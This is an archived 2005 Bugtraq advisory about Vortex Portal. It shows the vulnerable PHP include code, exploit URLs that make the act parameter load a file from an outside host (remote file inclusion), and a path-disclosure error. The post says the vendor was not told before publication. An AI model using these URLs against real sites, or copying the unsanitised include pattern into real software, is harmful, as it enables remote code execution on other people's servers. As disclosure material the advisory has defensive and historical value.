| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
| Open Source and information security mailing list archives | ||
| 
 | 
Message-ID: <20050323122343.19306.qmail@www.securityfocus.com>
Date: 23 Mar 2005 12:23:43 -0000
From: Francisco Alisson <dominusvis@...ck21.com.br>
To: bugtraq@...urityfocus.com
Subject: Vortex Portal
Vortex Portal Multiples Bugs
Vendor: http://www.VortexPortal.net
Contact: Brian Price							 Email: VGChatter@...w.ca
I. Remote File Inclusion:
content.php -->
...
if (!isset($act)) {
	require_once("main.php");
} else {
	require_once("$act.php");
...
?>
index.php -->
...
require_once($root_dir."/content.php");
...
Exploits
 http://[target-host]/index.php?act=http://[host]/file
 http://[target-host]/content.php?act=http://[host]/file
II. Full Path Disclosure
 http://[target-host]/content.php?act=something-wrong
 and we've get :
 Warning: main(something-wrond.php): failed to open stream: No such file or directory in /home/*/content.php on line 9
 Fatal error: main(): Failed opening required 'something-wrond.php' (include_path='.:/usr/local/lib/php:/usr/lib/php:../:../') in /home/*/content.php on line 9
Ps.: the vendor wasn't informed.
[ Infektion Group ]
 by Dominus_Vis